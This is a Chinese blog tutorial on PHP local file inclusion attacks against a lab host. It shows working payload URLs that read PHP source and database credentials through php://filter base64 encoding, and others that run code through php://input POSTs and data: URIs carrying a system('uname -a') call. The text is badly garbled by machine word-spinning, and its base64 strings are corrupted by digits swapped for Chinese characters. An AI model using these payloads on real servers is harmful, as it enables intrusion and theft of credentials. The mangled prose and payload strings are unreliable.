lfi读取php,php LFI读php文件源码以及直接post webshell

php LFI读php文件源码以及间接post 网站shell

假如如下一个场景

(1) http://vulnerable/fileincl/example1.php?page=intro.php(该php文件包孕LFI漏洞)

(2) 然而你不有中央能够upload你的网站shell代码

(三) LFI只能读取到非php文件的源码(由于无奈解析履行 只能被爆菊花)

(4) 假如你能读取到config.php之类文件 或批准以间接拿到数据库账号远程入侵出来

【现在的标题问题是】?LFI如何读取到php文件的源码?

因而给大家做个演示?假如我正常用LFI去读/sqli/db.php文件?是无奈读取它的源码?它会被当做php文件被履行

Default

http://vulnerable/fileincl/example1.php?page=../sqli/db.php

http://vulnerable/fileincl/example1.php?page=../sqli/db.php

d119d121d85aaa9769b14a33a90082da.png

然而假如我用老外文章里说提到的口头?就能把指定php文件的源码以base64方式编码并被阐扬阐发出来

Default

http://vulnerable/fileincl/example1.php?page=php://filter/read=convert.base64-encode/resource=../sqli/db.php

http://vulnerable/fileincl/example1.php?page=php://filter/read=convert.base64-encode/resource=../sqli/db.php

73c0998b4aab5b57a185b95d3533de96.png

/sqli/db.php源码base64编码后的模式阐扬阐发如下

Default

PD9waHAgCiAgJGxuayA9IG15c三FsX2Nvbm5lY三QoImxvY2FsaG9zdCIsICJwZW50ZXN0ZXJsYWIiLCAicGVudGVzdGVybGFiIik七CiAgJGRiID0gbXlzcWxfc2VsZWN0X2RiKCdleGVyY2lzZXMnLCAkbG5rKTsKPz4K

PD9waHAgCiAgJGxuayA9IG15c三FsX2Nvbm5lY三QoImxvY2FsaG9zdCIsICJwZW50ZXN0ZXJsYWIiLCAicGVudGVzdGVybGFiIik七CiAgJGRiID0gbXlzcWxfc2VsZWN0X2RiKCdleGVyY2lzZXMnLCAkbG5rKTsKPz4K

尔后我们再去停止base64解码?解码后/sqli/db.php文件的源码一览无遗

f0b076032dd66934297276648fca674b.png

看下去彷佛很锋利的容貌2三0;2三0;?然而?=_,=||~?再继续看下文~

奸通奸骗*奸通奸骗*奸通奸骗*奸通奸骗*奸通奸骗?我是险峻的分割线?奸通奸骗*奸通奸骗*奸通奸骗*奸通奸骗*奸通奸骗

【身手】php://input?和?data:

php://input?概况能够参考

http://zerofreak.blogspot.jp/2012/04/lfi-exploitation-via-phpinput-shelling.html

【前提】在allow_url_include?=?On?且?PHP?>=?5.2.0

【优势】间接POST?php代码并履行

【鸡肋】在allow_url_include?=?On?传说中就能够间接RFI了?不过不有vps的童鞋能够多么玩斗劲任意

在上面提到的同一个LFI漏洞点?我们又要来爆它一次菊花

Default

http://vulnerable/fileincl/example1.php?page=intro.php

http://vulnerable/fileincl/example1.php?page=intro.php

访问如下URL并用burp间接批改HTTP包?追加php命令代码

Default

http://vulnerable/fileincl/example1.php?page=php://input

http://vulnerable/fileincl/example1.php?page=php://input

e85c57d33cbfdf216fd3d514fbfa74d5.png

尔后某君再一次被爆菊?>_

02cc45f2156d09f986dd04b817bf2840.png

再换几种姿态继续??data:?的方式

Default

http://vulnerable/fileincl/example1.php?page=data://text/plain;base64,PD9waHBpbmZvKCk七Lyo=

http://vulnerable/fileincl/example1.php?page=data:;base64,PD9waHBpbmZvKCk七Lyo=

http://vulnerable/fileincl/example1.php?page=data:text/plain,<?php system("uname -a");?>

12三

http://vulnerable/fileincl/example1.php?page=data://text/plain;base64,PD9waHBpbmZvKCk七Lyo=   http://vulnerable/fileincl/example1.php?page=data:;base64,PD9waHBpbmZvKCk七Lyo=  http://vulnerable/fileincl/example1.php?page=data:text/plain,<?php system("uname -a");?>

ad6adefd764e1f91c3f43e0990e2f3c3.png

[via@casperkid / 2cto]

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值